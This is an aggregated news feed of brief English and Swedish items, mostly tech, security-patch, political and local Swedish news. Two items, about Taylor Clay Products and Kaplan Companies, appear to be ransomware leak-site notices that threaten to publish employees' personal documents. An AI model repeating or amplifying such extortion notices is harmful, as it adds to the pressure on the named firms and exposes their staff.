are getting the same features, plus access to meeting apps like Zoom. Gemini is also rolling out to cars with Google built-in, and it can answer questions specific to each vehicle that it's installed in. Screen Reactions - Screen Reactions lets users film with the front and back cameras at the same time for social media reaction videos. Instagram integration - Google worked with Meta to improve the video and photo quality of content captured with Android devices and uploaded to Instagram. Google is also adding new tools to the Edits app, and improving Instagram on Android tablets. Pause Point - Users can set an app as distracting, and Pause Point will give a 10-second breather before an app opens. Users can do a short breathing exercise or set a timer to limit time in the app. There are also options for looking at favorite photos, or moving to an alternative app like an audiobook app. Pause Point requires users to restart a phone to turn it off, which makes it more difficult to ignore. Google says Gemini Intelligence features will roll out in waves beginning with the latest Samsung Galaxy and Google Pixel phones this summer, and expanding to Android watch, car, glasses, and laptops later in the year. Gemini in Chrome features will be available in late June, with other Android 17 features expected to get to a stable release stage in June.Related Roundup: iOS 27Tags: Android, GoogleThis article, "Google Previews Android 17 With 'Gemini Intelligence' a Month Before Apple's iOS 27 Reveal" first appeared on MacRumors.comDiscuss this article in our forums

A case study in why credentials are revoked before firings.

Teen trusted ChatGPT to help him “safely” experiment with drugs, logs show.

Microsoft and G42's planned $1 billion AI data center in Kenya has stalled amid disagreements over power commitments, with President William Ruto saying the country would need to "switch off half the country" to support the project at full scale. Tom's Hardware reports: The project, announced in May 2024 during Ruto's visit to Washington, was supposed to bring a geothermal-powered data center to the Olkaria region in Kenya's Rift Valley. G42 was to lead construction, with the facility running Microsoft Azure in a new East Africa cloud region. The first phase targeted 100 megawatts of capacity and was expected to be operational by this year, with a long-term goal of scaling to 1 gigawatt. President Ruto isn't exaggerating about shutting off half the country's power. Kenya's total installed electricity capacity sits between 3,000 and 3,200 megawatts, and peak demand reached a record 2,444 megawatts in January, according to data from KenGen, the country's government-owned electricity producer. The full 1 gigawatt build would therefore have consumed roughly a third of the country's total capacity, and even the first 100 megawatts would have required a significant share of the Olkaria geothermal complex's output, which currently generates around 950MW across all its plants. John Tanui, principal secretary at Kenya's Ministry of Information, told Bloomberg that the project hasn't been withdrawn and that talks are continuing, adding that the "scale of the data center they [Microsoft] wanted to do still requires some structuring." A separate 60-megawatt project with local developer EcoCloud is also still under discussion. [...] Microsoft is spending $190 billion on capex in 2026, and the company adds approximately 1 gigawatt of data center capacity every three months globally. But power constraints are proving to be a universal bottleneck: nearly half of planned U.S. data center builds this year have been delayed or canceled due to shortages of electrical infrastructure. Read more of this story at Slashdot.

Microsoft has released the Windows 10 KB5087544 extended security update to fix the May 2026 Patch Tuesday vulnerabilities and resolve an issue with the new Remote Desktop warnings. [...]

China aimed to cooperate with Washington in the spirit of “equality, respect and mutual benefit”, Beijing said on Wednesday ahead of US President Donald Trump’s state visit and a pivotal summit with Chinese President Xi Jinping. Chinese foreign ministry spokesman Guo Jiakun said the two leaders would hold “in-depth exchanges of views on major issues concerning China-US relations as well as world peace and development”. “China stands ready to work with the United States in the spirit of equality,...

Starmer vows to fight on despite another day of pressure from his party to quit.

The firm takes a generalist approach, backing companies across categories such as AI applications, fintech, healthcare, and security. The average check size for this fund will be between $3 million and $5 million, with the aim to back at least 30 startups.

Marco Rubio will become the first sitting US Secretary of State under Chinese sanctions to visit Beijing. Images of Rubio leaving for China on Air Force One with Donald Trump appear to have answered previous questions about whether he would skip such a globally important event. Rubio is also serving as the US National Security Adviser and would normally have been expected to visit China to lay the groundwork for such a high-stakes summit. Instead he has met his Chinese counterpart Wang Yi twice...

Today&&#x23;x26;&#x23;39;s Microsoft patch Tuesday fixes 137 different vulnerabilities. In addition, the update addresses 137 Chromium-related issues affecting Microsoft Edge.&#xd;

Fortinet has released security patches for two critical vulnerabilities in FortiSandbox and FortiAuthenticator that could enable attackers to run commands or arbitrary code. [...]

Trafikverket varnar för älg på vägen på väg 190 Alingsås Tidning

Article URL: https://lists.thekelleys.org.uk/pipermail/dnsmasq-discuss/2026q2/018471.html Comments URL: https://news.ycombinator.com/item?id=48112042 Points: 358 # Comments: 199

Microsoft has released Windows 11 KB5089549 and KB5087420 cumulative updates for versions 25H2/24H2 and 23H2 to fix security vulnerabilities, bugs, and add new features. [...]

Today is Microsoft's May 2026 Patch Tuesday, with security updates for 120 flaws and no zero-days disclosed this month. [...]

Hey HN, Henry here from Cactus. We open-sourced Needle, a 26M parameter function-calling (tool use) model. It runs at 6000 tok/s prefill and 1200 tok/s decode on consumer devices.We were always frustrated by the little effort made towards building agentic models that run on budget phones, so we conducted investigations that led to an observation: agentic experiences are built upon tool calling, and massive models are overkill for it. Tool calling is fundamentally retrieval-and-assembly (match query to tool name, extract argument values, emit JSON), not reasoning. Cross-attention is the right primitive for this, and FFN parameters are wasted at this scale.Simple Attention Networks: the entire model is just attention and gating, no MLPs anywhere. Needle is an experimental run for single-shot function calling for consumer devices (phones, watches, glasses...).Training: - Pretrained on 200B tokens across 16 TPU v6e (27 hours) - Post-trained on 2B tokens of synthesized function-calling data (45 minutes) - Dataset synthesized via Gemini with 15 tool categories (timers, messaging, navigation, smart home, etc.)You can test it right now and finetune on your Mac/PC: https://github.com/cactus-compute/needleThe full writeup on the architecture is here: https://github.com/cactus-compute/needle/blob/main/docs/simp...We found that the "no FFN" finding generalizes beyond function calling to any task where the model has access to external structured knowledge (RAG, tool use, retrieval-augmented generation). The model doesn't need to memorize facts in FFN weights if the facts are provided in the input. Experimental results to published.While it beats FunctionGemma-270M, Qwen-0.6B, Granite-350M, LFM2.5-350M on single-shot function calling, those models have more scope/capacity and excel in conversational settings. We encourage you to test on your own tools via the playground and finetune accordingly.This is part of our broader work on Cactus (https://github.com/cactus-compute/cactus), an inference engine built from scratch for mobile, wearables and custom hardware. We wrote about Cactus here previously: https://news.ycombinator.com/item?id=44524544Everything is MIT licensed. Weights: https://huggingface.co/Cactus-Compute/needle GitHub: https://github.com/cactus-compute/needle Comments URL: https://news.ycombinator.com/item?id=48111896 Points: 590 # Comments: 172

Cannabisodling avslöjades av en slump – par döms till fängelse Alingsås Tidning

The EU plans to target "addictive design" features on TikTok, Instagram, and other platforms, including endless scrolling, autoplay, push notifications, and recommendation loops that can steer children toward harmful content. European Commission President Ursula von der Leyen said new regulation could arrive later this year, alongside an EU age-verification app meant to make child-safety rules easier to enforce. CNBC reports: "We are taking action against TikTok and its addictive design -- endless scrolling, autoplay, and push notifications. The same applies to Meta, because we believe Instagram and Facebook are failing to enforce their own minimum age of 13," Von der Leyen said. "We are investigating platforms that allow children to go down 'rabbit holes' of harmful content -- such as videos that promote eating disorders or self-harm," she added. The EU's executive arm has also developed its own age verification app, which has the "highest privacy standards in the world," according to Von der Leyen. Member states will soon be able to integrate it into their digital wallets, and it can easily be enforced by online platforms. "No more excuses -- the technology for age-verification is available," the EU chief said. The EU Commission could have a legal proposal prepared as soon as the summer, as it awaits the advice and findings of its 'Special Panel of experts on Child Safety Online.' Read more of this story at Slashdot.

The situation could still change and there might be more confirmed cases, warns the head of the World Health Organization.

Article URL: https://duckdb.org/2026/05/12/quack-remote-protocol Comments URL: https://news.ycombinator.com/item?id=48111765 Points: 357 # Comments: 75

Apple today said Hearing Aid features are now available for the AirPods Pro 2 and AirPods Pro 3 in Italy, Romania, and Czechia, while Hypertension alerts have expanded to Israel. The Hearing Aid option allows the AirPods Pro to be used as an over-the-counter alternative to a traditional set of hearing aids. The AirPods Pro can improve sound to mitigate mild to moderate hearing loss, adjusting voices and sounds around the user to improve hearing. It can also set music, videos, and phone calls to optimal sound levels using a personalized hearing profile created after taking a Hearing Test. Loud Sound Reduction also prevents hearing damage from loud ambient noise by cutting down on high-decibel sound when using Transparency and Adaptive modes. Hearing Aid capabilities are available with the AirPods Pro 2 and ‌AirPods Pro 3‌ when paired with a device running iOS 26/iPadOS 26 or later. In Israel, users will be able to get an alert if the Apple Watch detects signs of chronic high blood pressure. Alerts use data collected from the heart rate sensor over a 30-day period. Hypertension alerts are available on the Apple Watch Series 9 and later and the Apple Watch Ultra 2 and later.Related Roundups: AirPods 4, Apple Watch 11Buyer's Guide: AirPods (Neutral), Apple Watch (Caution)Related Forum: AirPodsThis article, "Apple Watch Hypertension Alerts and AirPods Hearing Aid Feature Expand to More Countries" first appeared on MacRumors.comDiscuss this article in our forums

Today's Patch Tuesday is a busier one than normal for the quarter. Both AMD and Intel have rolled out new updates for Linux customers among other security disclosures today. Thankfully though the vulnerabilities don't appear to be too widespread or impactful...

"All modern operating systems do this, including macOS and Linux."

Hur mycket ångest har hon efter intervjun i Fördomsshowen – och är Mohamsson en dålig förlorare? L-ledaren svarar på publikens frågor direkt från sitt privata kontor, ingen fråga är förbjuden!

https://www.reddit.com/r/Android/comments/1tb8xls/introducin... Comments URL: https://news.ycombinator.com/item?id=48111545 Points: 890 # Comments: 1477

Article URL: https://www.eff.org/deeplinks/2026/05/canadas-bill-c-22-repackaged-version-last-years-surveillance-nightmare Comments URL: https://news.ycombinator.com/item?id=48111531 Points: 360 # Comments: 116

Rapport hade tekniska problem under sin 19.30-sändning. ”Vi väntar på Rapport pga tekniska problem”, stod det i sändningen.

[AI generated] N/A

eBay board doubts GameStop's ability to buy and operate the much larger firm.

US President Donald Trump departed for a three-day state visit to China on Tuesday without first lady Melania Trump, travelling instead with Cabinet officials and business executives in a delegation that contrasts sharply with the pageantry of his 2017 visit. Hours before his departure, the office of the first lady confirmed Melania’s no-show in an email response to the South China Morning Post. “First lady Melania Trump is not travelling this time,” a spokesperson said. The confirmation comes a...

Apple's newest M5 Pro and M5 Max MacBook Pro models have been hitting new low prices on Amazon recently, and now the M5 model from 2025 has a new record low price. You can get the 32GB/1TB 14-inch M5 MacBook Pro for $1,799.00, down from $2,099.00. Note: MacRumors is an affiliate partner with Amazon. When you click a link and make a purchase, we may receive a small payment, which helps us keep the site running. At $300 off, this is now the lowest price we've ever tracked on this model, and it's only available in Silver. This is the model that launched in the fall of 2025 as part of a refresh of the MacBook Pro lineup, featuring a 14.2-inch Liquid Retina XDR display and 10-core CPU and 10-core GPU. $300 OFFM5 MacBook Pro (32GB/1TB) for $1,799.00 Amazon provides an estimated delivery date of May 13-14 for free delivery options, depending on your location. If you're on the hunt for more discounts, be sure to visit our Apple Deals roundup where we recap the best Apple-related bargains of the past week. Deals Newsletter Interested in hearing more about the best deals you can find in 2026? Sign up for our Deals Newsletter and we'll keep you updated so you don't miss the biggest deals of the season! Related Roundup: Apple DealsThis article, "M5 MacBook Pro Hits Record Low Price With Major $300 Discount at Amazon" first appeared on MacRumors.comDiscuss this article in our forums

DXVK-NVAPI 0.9.2 is now available for this implementation of NVIDIA's NVAPI/NVOFAPI interfaces atop DXVK and VKD3D-Proton that is used in turn by Valve's Steam Play (Proton) for enhanced NVIDIA Linux gaming support...

Powders, gels, and fermented nutrients could someday join the battlefield menu

Google has revealed its vision for the AI laptop of tomorrow.

Google has big plans for Android in 2026, and most of it is AI.

We wanted to let the Exchange Server community know that there are no security releases for any version of Exchange Server in May 2026, for customers with Exchange SE, or Exchange 2016 or 2019 ESU. Please keep upgrading your organizations to Exchange SE. The Exchange Team

Cooperative symbolism behind tea with the Trumps in the Forbidden City This article was first published on November 10, 2017 by Laura Zhou Beijing’s Forbidden City was more than just an opulent backdrop for US President Donald Trump’s first day in China. One of the main halls used to stage a set piece on Trump’s tour of the former imperial palace was weighted with meaning and chosen to underscore cooperation between the two countries. As part of their higher-than-usual welcome to the capital,...

An anonymous reader quotes a report from Reuters: EBay on Tuesday rejected a $56 billion takeover bid from the much smaller GameStop over financing doubts, calling the proposal "neither credible nor attractive." EBay, which has roughly four times GameStop's market value, also underscored that its turnaround efforts under CEO Jamie Iannone have boosted growth, with its stock returning 201% since Iannone took the position six years ago. "We have concluded that your proposal is neither credible nor attractive," eBay Chairman Paul Pressler said in a statement. "eBay's Board is confident the company, under its current management team, is well-positioned to continue to drive sustainable growth." He also pointed to concerns with GameStop's bid, including its financing, its impact on eBay's long-term growth and the leadership structure of a potentially combined company. Last week, GameStop's CEO Ryan Cohen delivered one of the most memorable CNBC interviews in recent memory... initially disinterested, then increasingly hostile, with little eye contact, few real answers to basic questions, and repeated robotic deflections to "check the website." It's worth a watch if you have a few extra minutes. Read more of this story at Slashdot.

An IBM engineer posted the first set of patches enabling the Rust programming language support for the Linux kernel to be built on the s390 architecture...

Quietly extends waivers to 2029 after realizing it was about to leave millions of devices unpatched

I går kunde SVT avslöja att Foxtrots ”andreman” Mohamed ”Moewgli” Mohdhi har gripits av polis i Tunisien. Nu kommenterar justitieminister Gunnar Strömmer och polisen uppgifterna. – Vår polis vet vilka de är ute efter, säger justitieministern.

Exim has released security updates to address a severe security issue affecting certain configurations that could enable memory corruption and potential code execution. Exim is an open-source Mail Transfer Agent (MTA) designed for Unix-like systems to receive, route, and deliver email. The vulnerability, tracked as CVE-2026-45185, aka Dead.Letter, has been described as a use-after-free

I kväll är det dags för semifinal i Eurovision. Förutom Sverige kommer också Israel att tävla i kväll. Och flera länder har som Spanien, Irland och Nederländerna bojkottat årets upplaga på grund av Israels medverkan.

Fullvuxna vildsvin har länge bökat upp och förstört delar av Kvibergs kyrkogård i Göteborg. Men nu på vårkanten har ett nytt gäng synts till – nämligen en hel kull kultingar. – Då de inte har en mamma så har vi märkt att de är väldigt närgångna, berättar Julia Tomasson som bor i närheten.

Alingsås: 9 grader och mulet under kvällen Alingsås Tidning

Andriy Yermak was named by Ukraine's two anti-corruption agencies as a suspect in a money-laundering scheme.

Instructure CEO Steve Daly's got some explaining to do

Long story short - Small business of submitted by

Apple today announced that characters from the hit animated kids show Bluey are coming to five Apple Arcade games starting Thursday, May 21, as part of a limited-time crossover event. The games that will be receiving Bluey updates include Crossy Road Castle, stitch., puffies., Suika Game+, and Disney Coloring World+. Bluey is coming to Crossy Road Castle Apple Arcade will also be adding another four games on Thursday, June 4: Mini Football Legends, My Talking Tom 2+, Coffee Inc 2+, and FreeCell Solitaire: Card Game+. More details about each game are outlined in Apple's announcement. Apple Arcade is a subscription service that provides access to hundreds of games across the iPhone, iPad, Mac, Apple TV, and Apple Vision Pro. All of the games are free of ads and in-app purchases. In the U.S., Apple Arcade costs $6.99 per month, and it is also bundled with other Apple services in all Apple One plans. Apple Arcade can be accessed through the App Store and the Apple Games app.Tags: Apple Arcade, BlueyThis article, "Bluey is Taking Over Apple Arcade Next Week" first appeared on MacRumors.comDiscuss this article in our forums

The FCC has softened its ban on foreign-made consumer routers, allowing vendors to keep issuing broader software and firmware updates for devices already in use in the U.S. through at least January 2029. Dark Reading reports: Under the original FCC ruling, foreign manufacturers were permitted to provide only limited maintenance and security patches to US customers through March 2027. In a public note (PDF) on May 8, the FCC extended that deadline to at least January 2029 and also expanded the scope of permissible updates. The FCC will now allow foreign manufacturers to provide not just minor security fixes and changes, but also more major software and firmware updates that could affect router functionality, which previously required additional FCC review. The agency described the revisions as intended to ensure the continued safety of already deployed foreign-made consumer routers in the US. "The FCC likely issued this revision in response to the operational realities of network security and the slow pace of equipment replacement," says Jason Soroko, senior fellow at Sectigo. "Replacing millions of embedded devices across national infrastructure requires immense time and capital, and abandoning existing systems to a completely unpatched state would create an immediate vulnerability." "This waiver significantly alleviates the most pressing fears tied to the initial ban by preventing a sudden and dangerous security vacuum," added Soroko. Read more of this story at Slashdot.

Article URL: https://obsidian.md/blog/future-of-plugins/ Comments URL: https://news.ycombinator.com/item?id=48109970 Points: 438 # Comments: 159

After guilty pleas, prison terms, and seizures, the DOJ has opened the compensation process

Article URL: https://www.epicfurious.com/ Comments URL: https://news.ycombinator.com/item?id=48109519 Points: 371 # Comments: 124

Article URL: https://www.nair.sh/guides-and-opinions/communicating-your-expertise/why-senior-developers-fail-to-communicate-their-expertise Comments URL: https://news.ycombinator.com/item?id=48109460 Points: 746 # Comments: 315

A senior Chinese diplomat has accused Europe of taking an outdated, inward-looking approach to China, while signalling that Beijing is open to addressing Brussels’ concerns. Li Jian, director general of the Chinese foreign ministry’s Department of European Affairs, delivered his strongly worded speech at a high-level forum on Tuesday. At the conference hosted by the European Union delegation to China in Beijing, officials and experts from both sides shared concerns about economic dependencies,...

If your Mac's storage has been mysteriously shrinking recently and you use Google Chrome, you may have already identified the culprit. The browser has been downloading a 4GB AI model file onto computers without explicit user consent. Here's how to reclaim the space. The file in question is called "weights.bin," which powers Google's on-device Gemini Nano AI model – the engine behind Chrome features like scam detection, autofill suggestions, and the "Help Me Write" tool. Local models tend to be pretty big storage-wise, and this one is no different. The problem is that Google hasn't clearly signposted the fact that it's eating 4GB of your drive with training data. The issue only recently came to light thanks to security researcher Alexander Hanff, who noticed that Chrome installs the model on any device meeting the minimum hardware requirements, only without prompting you whether you'd like it there in the first place. How to Check if the File Is on Your Mac The first thing to do is confirm that the model is actually taking up space on your machine. While there's no clear answer in Google's release notes, recent reports suggest that the file started appearing after updating to Chrome version 148.0.7778.97. Here's how you can find out if your computer was affected: Open Finder, then click Go in the menu bar. Hold the Option key and click Library in the dropdown menu. Open Application Support ➝ Google ➝ Chrome ➝ Default. Look for a folder named "OptGuideOnDeviceModel." If the folder exists and contains a file called weights.bin, the model is installed. You can right-click the file and choose Get Info to confirm its size. If the folder isn't there, you can relax – Chrome hasn't downloaded the model to your Mac. How to Remove the 4GB File for Good Simply deleting weights.bin from Chrome's library folder isn't a long-term solution because Chrome will likely quietly re-download it the next time you launch the browser. To make the removal permanent, you need to disable Chrome's on-device AI features. Open Chrome. Click the three-dot menu in the top-right corner, then choose Settings. In the left sidebar, click System. Toggle off On-device AI. Once this setting is switched off, Chrome will remove the model and should stop downloading it in future updates. Remember that deleting the model will also disable any Chrome features that rely on it. If you don't see the toggle in Chrome's Settings, it likely hasn't propagated to your computer yet. In that case, type chrome://flags into Chrome's address bar and disable any AI-related flags you see, then delete the weights.bin file manually in Finder. If after that you're still concerned about the lack of consent, it might be worth switching to a different browser.Tag: ChromeThis article, "Stop Chrome Browser From Downloading a Hidden 4GB AI File" first appeared on MacRumors.comDiscuss this article in our forums

I en affär värd 845 miljoner kronor så säljer Botrygg i Linköping en rad fastigheter i staden till bolaget Episurf. Bland annat ingår fotbollsanläggningen Linköping arena i köpet.

Parallellt med rättegången i det stora kopplerimålet i Ångermanland utreds ännu fler misstänkta sexköpare i härvan. Preskriptionstiden för köp av sexuell tjänst eller handling är två år och polisen jobbar nu febrilt med extra resurser för att så många sexköpare som möjligt ska kunna ställas inför rätta. Ändå kan ungefär hälften av dem som avslöjats komma att gå fria.

Som 15-åring ertappades Fredric Gülich Brendling med hasch – några år senare klassade polisen honom som del av en kriminell gruppering. Nu är 21-åringen dömd till livstids fängelse efter att ha mördat tre personer i en frisersalong i Uppsala.

Article URL: https://www.jeffgeerling.com/blog/2026/bambu-lab-abusing-open-source-social-contract/ Comments URL: https://news.ycombinator.com/item?id=48109224 Points: 1345 # Comments: 416

While the ongoing RAM chip shortage is leading some Android smartphone makers to increase prices, one analyst believes that Apple will take advantage of the situation with the upcoming iPhone 18 Pro and iPhone 18 Pro Max. In a research note with GF Securities today, analyst Jeff Pu said he expects Apple to outperform in the smartphone market by having an "aggressive pricing strategy" for the iPhone 18 Pro models. He previously predicted that the starting prices of the iPhone 18 Pro models will be unchanged or only slightly higher compared to the iPhone 17 Pro models. In the U.S., the iPhone 17 Pro starts at $1,099 and the iPhone 17 Pro Max starts at $1,199, with 256GB of storage. Both devices are equipped with 12GB of RAM, and the iPhone 18 Pro models are expected to have an equal amount of RAM. Apple said that it expects "significantly higher memory costs" in the current March-June quarter, so it is not entirely immune to the problem. However, Apple's scale likely gives it more leverage over RAM suppliers compared to most if not all Android smartphone makers. In addition, Pu previously said that he expected Apple to find ways to lower the costs of some other iPhone components, including the display and cameras. iPhone 18 Pro models are rumored to feature a smaller Dynamic Island, a faster A20 Pro chip, variable aperture for at least one rear camera, a simplified Camera Control button, 5G via satellite, a special "Dark Cherry" color, and more. Apple is expected to unveil the iPhone 18 Pro models in September, while the iPhone 18 and iPhone 18e are expected to debut around March 2027.Related Roundup: iPhone 18 ProTag: Jeff PuThis article, "iPhone 18 Pro May Have 'Aggressive' Starting Price Despite RAM Crisis" first appeared on MacRumors.comDiscuss this article in our forums

Volume and sensitivity of the data cited as chief concerns

Det brann på en avfallsanläggning i Sunderbyn utanför Luleå under tisdagseftermiddagen. Räddningstjänsten var på plats med flera enheter – och räknade med en långvarig insats. – Vi har inte fokus på att släcka branden utan vi behöver lägga resurser på att förhindra spridning till angränsade högar, sa insatsledaren Adam Dahlberg.

RubyGems, the standard package manager for the Ruby programming language, has temporarily paused account sign ups following what has been described as a "major malicious attack." "We're dealing with a major malicious attack on RubyGems right now," Maciej Mensfeld, senior product manager for software supply chain security at Mend.io, said in a post on X. "Signups are paused for the time being.

Skistars sena beslut att inte ha sommaraktiviteter i Vemdalen i år har väckt starka reaktioner i området. På måndagen var bolagets vd Stefan Sjöstrand på plats för att bland annat träffa personal. – Det är aldrig positivt när man behöver fatta sådana här beslut, säger han, och trycker samtidigt på att det handlar om en paus och inte en permanent nedstängning.

Destination Vemdalen fick ingen förvarning innan Skistar meddelade att de stänger ner sin klätterpark och liftburna cykling i sommar. – Jag blev både förvånad och lite chockad. De kom väldigt sent och vi har ju jobbat utifrån att Skistar ska ha öppet i sommar, säger Anna Hansson som är vd för Vemdalens destinationsbolag.

The Apple Sales Coach app will begin using AI-generated video presenters to deliver personalized training content to retail salespeople around the world. In a new video message, an Apple trainer said that the update addresses a limitation of traditional training programs: the impossibility of creating truly individualized content for hundreds of thousands of salespeople across different markets, languages, and product focuses. Apple said it will now use AI to generate short, focused videos tailored to the products a seller works with, the skills they are developing, and the language they speak. Apple to Use AI-Generated Presenters for Sales Training Videos pic.twitter.com/6DRkLAvyfm— Aaron (@aaronp613) May 12, 2026 AI-generated presenters will be identifiable by an on-screen icon, and Apple emphasized that the underlying content remains entirely human-driven. The company's training team apparently writes every script and verifies every detail, with AI serving as the delivery mechanism rather than the author. Apple said the shift will allow it to produce more videos on more topics, faster, and update them more frequently than was previously possible. The company described the move as "just the beginning," noting that Apple Sales Coach improves the more it is used.Tag: Artificial IntelligenceThis article, "Apple Sales Coach Will Use AI-Generated Video Presenters" first appeared on MacRumors.comDiscuss this article in our forums

Polisen har fått kännedom om flera eventuella rekryteringsförsök i Umeå senaste tiden. Polisen sätter nu in mer resurser ute vid idrottsanläggningar. – Vi tar det på största allvar, säger Maria Forsberg, gruppchef för områdespolisen i Umeå.

Taiwan is watching the coming summit between US President Donald Trump and Chinese leader Xi Jinping with unease, concerned that any discussions over arms sales could see the island used as leverage in a broader Sino-American deal. Trump arrives in Beijing on Wednesday for a three-day state visit. According to the White House, the engagements will include a bilateral meeting with Xi and a state banquet on Thursday, as well as a working lunch before Trump departs on Friday. Speaking at the White...

Launch of Musk's monster rocket could be in May

Taylor Clay Products specializes in premium architectural brick, thin brick, and custom masonry solutions, catering to architects and builders for over 75 years. The company offers a wide se lection of colors, textures, and finishes, including custom blends tailored to specific project s. We will upload 72gb of corporate data soon. Employee personal information (DL and other persona l docs), contracts, client information, drawings and specifications.

Kaplan Companies specializes in providing rental and commercial properties, focusing on new hom es and maintenance services for current residents. The company aims to cater to individuals and families seeking quality housing solutions. We will upload 45gb of corporate data soon. Employee and owners personal information (passports , DLs, SSNs, and other personal docs), contracts and agreements, client information, financials , payment details, projects files, drawings and specifications and so on.

En svensk resenär på ett flyg från Johannesburg har exponerats för en hantavirussmittad person. Nu isoleras svensken. – En passagerare har befunnit sig tillräckligt nära för att falla ut i en smittspårning, säger tf statsepidemiolog Erik Sturegård i Morgonstudion.

Hello r/sysadmin, I'm u/AutoModerator, and welcome to this month's Patch Megathread! This is the (mostly) safe location to talk about the latest patches, updates, and releases. We put this thread into place to help gather all the information about this month's updates: What is fixed, what broke, what got released and should have been caught in QA, etc. We do this both to keep clutter out of the subreddit, and provide you, the dear reader, a singular resource to read. For those of you who wish to review prior Megathreads, you can do so here. While this thread is timed to coincide with Microsoft's Patch Tuesday, feel free to discuss any patches, updates, and releases, regardless of the company or product. NOTE: This thread is usually posted before the release of Microsoft's updates, which are scheduled to come out at 5:00PM UTC. Remember the rules of safe patching: Deploy to a test/dev environment before prod. Deploy to a pilot/test group before the whole org. Have a plan to roll back if something doesn't work. Test, test, and test! submitted by /u/AutoModerator [link] [comments]

A tokenizer library file present in Hugging Face AI models can be manipulated to hijack the model's outputs and exfiltrate data.

It's been nearly one year to the week since Intel introduced Project Battlematrix as their initiative for improving their Linux driver support for the Arc Pro B-Series with enhancements such as bettering the multi-GPU support in allowing up to eight Arc Pro GPUs per system as well as other open-source driver optimizations in the era of AI. Recently with the Arc Pro B70 in having four review samples for testing I was finally able to try out the multi-GPU state of the Arc (Pro) graphics cards on Linux with their open-source driver code.

Den tidigare L-ministern Paulina Brandberg utesluter inte att återvända till riksdagen – över sommaren. – Jag har inte bestämt hur jag ska göra, säger hon.

Skaparen bakom det populära open source-verktyget Curl, svenske Daniel Stenberg, är skeptisk till hajpen kring Anthropics nya AI-modell Mythos. Anthropic själva beskriver Mythos som en avancerad AI för att upptäcka säkerhetsbrister i kod. Enligt Stenberg analyserade modellen en färsk version av Curl:s Git-repository och rapporterade bara fem påstådda säkerhetsproblem. Efter att Curl-teamet granskat dessa återstod bara en vanlig bugg och en faktisk sårbarhet, rapporterar The Register. Den enda bekräftade sårbarheten ska enligt Stenberg få en CVE-klassificering med låg allvarlighetsgrad och väntas åtgärdas i samband med nästa Curl-version, 8.21.0, senare i juni. Samtidigt säger Stenberg att Mythos faktiskt lyckades hitta flera andra buggar och att rapporterna var välskrivna och tydliga. Han menar dock att dagens AI-baserade kodanalysverktyg redan är bra på den här typen av arbete och han är därför inte vidare imponerad av Mythos. “Ett otroligt framgångsrikt marknadsföringsjippo”, skriver Daniel Stenberg på sin blogg.

Över 170 paket i både NPM- och PyPI-ekosystemen har komprometterats i en ny omfattande supply chain-attack kallad “Mini Shai-Hulud”, rapporterar Security Week. Attacken har drabbat bland annat populära projekt från Tanstack, Mistral AI, Opensearch och Ui Path. De infekterade paketen innehöll skadlig kod som försöker stjäla utvecklaruppgifter, API-nycklar, molnhemligheter, kryptoplånböcker och autentiseringsuppgifter till AI-verktyg och meddelandetjänster. I attacken mot Tanstack utnyttjade angriparna flera brister i projektets Github Actions-flöden för att publicera 84 skadliga paketversioner via den legitima release-pipelinen. Paketens skadeprogram, router_init.js, användes för att stjäla känslig information och försökte sprida sig vidare. Även Python-paket från Mistral AI och Guardrails AI infekterades med separat Linux-baserad skadlig kod som bland annat riktade in sig på lösenordshanterare som 1Password och Bitwarden. Hackergruppen TeamPCP pekas ut för att ligga bakom attacken. Gruppen har tidigare kopplats till flera supply chain-attacker mot open source-ekosystem.

Former franchise operators claim telco unfairly cut commission and other payments

Enligt uppgifter till Financial Times har Amazons anställda börjat använda företagets AI-verktyg Meshclaw för att automatisera mängder av oviktiga uppgifter. Detta främst för att förbättra sin statistik vad gäller AI-användningen. Amazon har satt som mål att över 80 procent av företagets utvecklare ska använda AI varje vecka. Företaget har också börjat mäta och visa statistik över AI-användning och tokenförbrukning internt. Meshclaw kan skapa AI-agenter som exempelvis kan hantera e-post, interagera med Slack och utföra enklare arbetsuppgifter automatiskt. Enligt anställda har det skapat en kultur där vissa försöker maximera sin användning snarare än att använda verktygen effektivt. En del oroar sig samtidigt över att använda AI-verktyget eftersom det kan skapa säkerhetsrisker och leda till att uppgifter utförs felaktigt.

Workers are using an internal AI tool to automate non-essential tasks.

Uppdrag gransknings dokumentärserie ” Jakten ” nomineras till Golden Nymph Awards på den internationella tv-festivalen i Monte-Carlo. I dokumentären följer reporter Diamant Salihu polisens kamp mot pedofiler. – Det känns otroligt viktigt att få lyfta det här ämnet och göra dokumentären tillgänglig för en internationell publik, säger Diamant Salihu.

Article URL: https://blog.maximeheckel.com/posts/on-rendering-the-sky-sunsets-and-planets/ Comments URL: https://news.ycombinator.com/item?id=48107997 Points: 516 # Comments: 40

Tech firm's employees can get an 'admin' role letting them into the National Data Integration Tenant... and its identifiable information

N/A

Två barn och en tidigare ostraffad kvinna har pekats ut som de som tänt på när det brann utanför lägenheter på Råslätt och Liljeholmen i november förra året. Tretton rättegångsdagar är avsatta i Jönköpings tingsrätt, där rättegången nu startar.

En maskinförare visade symtom efter ett falskt gaslarm. SSAB valde att pausa sina mätningar tillfälligt för att kunna gå igenom händelseförloppet tillsammans med entreprenörer och facket. – Vi pausar för minsta lilla, säger Amelie Winberg vid NCC.

Sabeen Malik is VP, Global Government Affairs and Public Policy at Rapid7.⠀Security teams need a better way to connect what they detect, what they fix, and what they can prove.The pace of modern security operations no longer works in defenders’ favor. IBM’s Cost of a Data Breach Report 2025 found that the mean time to identify and contain a breach is now 241 days, even as AI and automation help defenders move faster. At the same time, Rapid7’s 2026 Global Threat Landscape Report shows how quickly attacker behavior is compressing the response window: exploited high and critical severity vulnerabilities more than doubled year over year, increasing 105% from 71 in 2024 to 146 in 2025, while the median time from publication to CISA KEV inclusion fell from 8.5 days to 5.0 days. This is not a future risk. It is today’s operational reality.It also exposes a governance problem most security programs were not built to solve. Security teams are expected to demonstrate, continuously, that controls are working, that risk is being reduced, and that security investments are delivering measurable outcomes. Point-in-time audit evidence, assembled quarterly, is structurally incompatible with an environment where the threat picture changes in minutes.The underlying issue is not a lack of effort, but a disconnect. Security data lives in one place, remediation happens in another, and evidence for auditors is assembled somewhere else. When leadership asks what changed, what was fixed, and what risk remains, teams are left stitching the story together manually producing reports that reflect where the organization was, not where it is.Cyber GRC closes that gap by bringing governance, risk management, and compliance closer to the security data and workflows teams already rely on.Why security operations and compliance need connected dataFor years, security operations and GRC have run in parallel. One team manages threats, exposures, and remediation. Another manages policies, controls, audits, and evidence. Both aim to reduce risk, but typically without shared context or shared data.That separation is no longer sustainable. Vulnerability exploitation rose 34% year-over-year and now accounts for 20% of all breaches, with a median of zero days between critical vulnerability publication and 